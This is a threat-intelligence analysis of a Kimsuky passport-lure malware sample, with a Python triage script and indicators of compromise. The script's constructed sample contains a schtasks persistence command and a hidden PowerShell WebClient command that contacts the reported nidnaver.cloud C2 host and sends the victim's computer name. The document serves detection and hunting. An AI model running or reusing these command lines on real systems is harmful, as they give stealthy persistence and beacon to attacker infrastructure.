Kimsuky Group Passport-Themed Attack: Analysis of Malware for Stealing Personal Information (2025.6.18)

2025-07-01 Sakai Kimsuky Passport-Themed Attack: Analysis of Malware for Stealing Personal Information (2025.6.18)

https://wezard4u.tistory.com/429525


A Korean-language analysis attributes a passport-themed malware sample to Kimsuky and notes that images of Korean passports may have been stolen, or otherwise misused, as lure material. The sample is identified by its MD5, SHA-1 and SHA-256 hashes. Its embedded payload is wrapped in three layers of Base64; once decoded, it drops chromeupdate.js under %APPDATA%\Microsoft\Windows\Templates and registers a scheduled task named "Google Chrome Update" that launches the script with wscript.exe every minute. PowerShell, using the .NET WebClient class, sends the victim's computer name and OS version to attacker-controlled PHP endpoints, downloads a decoy Template.pdf, and executes further code fetched from nidnaver.cloud infrastructure. The case is relevant for tracking Kimsuky's use of personal-document lures and lightweight, script-based persistence; the scheduled task name, the drop path and the nidnaver.cloud hosts are the practical hunt points.
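The following triage helper is an added example, not code from the original analysis or from the sample itself. It peels nested Base64 layers the way an analyst would when unwrapping a dropper like the one described above, then pulls scheduled-task parameters, %APPDATA% drop paths and URLs out of the decoded text and scores them against the behaviours the report describes. The embedded sample is constructed: the schtasks and PowerShell command lines are a stand-in for the real dropper's content, and the URL path and query string are placeholders rather than the report's (truncated) URLs.

```python
"""Triage helper for layered-Base64 script droppers (constructed example)."""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import urlparse

# Standard Base64 alphabet only, line breaks tolerated, optional padding.
_B64_RE = re.compile(rb"[A-Za-z0-9+/\r\n]+={0,2}")

# Indicator patterns for the kind of command lines this chain is reported to use.
_URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
_APPDATA_PATH_RE = re.compile(r"%APPDATA%\\[^\s'\"]+", re.IGNORECASE)
_TASK_NAME_RE = re.compile(r"/tn\s+\"([^\"]+)\"", re.IGNORECASE)
_TASK_MINUTES_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.IGNORECASE)

# Behaviours taken from the report, used to score the decoded content.
REPORTED_TASK_NAME = "Google Chrome Update"
REPORTED_DROP_PATH = r"%APPDATA%\Microsoft\Windows\Templates\chromeupdate.js"
REPORTED_C2_SUFFIX = "nidnaver.cloud"


def _looks_like_text(data: bytes) -> bool:
    """Heuristic: a decoded layer that is printable ASCII is script text, not noise."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_base64(blob: bytes, max_layers: int = 8) -> tuple[bytes, int]:
    """Strip nested Base64 layers while each layer still looks like Base64 and
    decodes to printable text. Returns (innermost bytes, number of layers removed)."""
    current = blob.strip()
    layers = 0
    while layers < max_layers and _B64_RE.fullmatch(current):
        try:
            decoded = base64.b64decode(current, validate=False)
        except (binascii.Error, ValueError):
            break
        if not decoded or not _looks_like_text(decoded):
            break  # stop rather than "decode" plaintext that happens to fit the alphabet
        current = decoded.strip()
        layers += 1
    return current, layers


def extract_indicators(text: str) -> dict:
    """Pull URLs, hosts, %APPDATA% drop paths and schtasks parameters from script text."""
    urls = sorted(set(_URL_RE.findall(text)))
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {
        "urls": urls,
        "hosts": hosts,
        "appdata_paths": sorted(set(_APPDATA_PATH_RE.findall(text))),
        "task_names": sorted(set(_TASK_NAME_RE.findall(text))),
        "task_minutes": sorted({int(m) for m in _TASK_MINUTES_RE.findall(text)}),
        "uses_wscript": "wscript.exe" in text.lower(),
        "uses_webclient": "webclient" in text.lower(),
    }


def match_report(ind: dict) -> list[str]:
    """Return which of the report-described behaviours the indicators exhibit."""
    hits = []
    if REPORTED_TASK_NAME in ind["task_names"]:
        hits.append("scheduled task 'Google Chrome Update'")
    if 1 in ind["task_minutes"]:
        hits.append("task repeats every minute")
    if any(p.lower() == REPORTED_DROP_PATH.lower() for p in ind["appdata_paths"]):
        hits.append("chromeupdate.js under %APPDATA%\\Microsoft\\Windows\\Templates")
    if ind["uses_wscript"]:
        hits.append("wscript.exe launcher")
    if any(h.endswith(REPORTED_C2_SUFFIX) for h in ind["hosts"]):
        hits.append("nidnaver.cloud infrastructure")
    if ind["uses_webclient"]:
        hits.append("PowerShell WebClient beacon")
    return hits


def triage(blob: bytes) -> dict:
    """Decode every layer, then report layer count, indicators and report matches."""
    inner, layers = peel_base64(blob)
    text = inner.decode("utf-8", errors="replace")
    ind = extract_indicators(text)
    return {"layers": layers, "indicators": ind, "report_matches": match_report(ind)}


# Constructed sample: stand-in command lines, Base64-encoded three times as the
# report describes. The URL path/query are placeholders, not the report's URLs.
_INNER = (
    'schtasks /create /sc minute /mo 1 /tn "Google Chrome Update" '
    '/tr "wscript.exe %APPDATA%\\Microsoft\\Windows\\Templates\\chromeupdate.js" /f\r\n'
    "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString("
    "'http://toes.nidnaver.cloud/sample.php?n='+$env:COMPUTERNAME)\"\r\n"
)
SAMPLE_BLOB = _INNER.encode()
for _ in range(3):
    SAMPLE_BLOB = base64.b64encode(SAMPLE_BLOB)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_BLOB), indent=2))
```

Run it against a real blob by replacing SAMPLE_BLOB with the bytes of the embedded payload; the layer count is a quick sanity check against the report's "three times", and the host list gives you the values to pivot on in proxy and DNS logs. The text-likeness check is deliberate: it stops the loop before it "decodes" plaintext that happens to contain only Base64 alphabet characters.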

Indicators of Compromise

Type    Value                                 First Seen   Last Seen
HASH    3480dd059adb53a6be9d063d16f6f22…      2025-07-01   2025-07-01
HASH    0e75a7d2077c13eb5c8b1329ea3b254…      2025-07-01   2025-07-01
HASH    c0b47dc97cf9552b564cb227b6de12c3      2025-07-01   2025-07-01
URL     http://knees.nidnaver.cloud/fre…      2025-07-01   2025-07-01
URL     http://toes.nidnaver.cloud/free…      2025-07-01   2025-07-01
URL     http://toes.nidnaver.cloud/free…      2025-07-01   2025-07-01
DOMAIN  toes.nidnaver.cloud                   2025-07-01   2025-07-01

The first two hash values and the three URLs are truncated as displayed; the 32-character hash is the MD5.
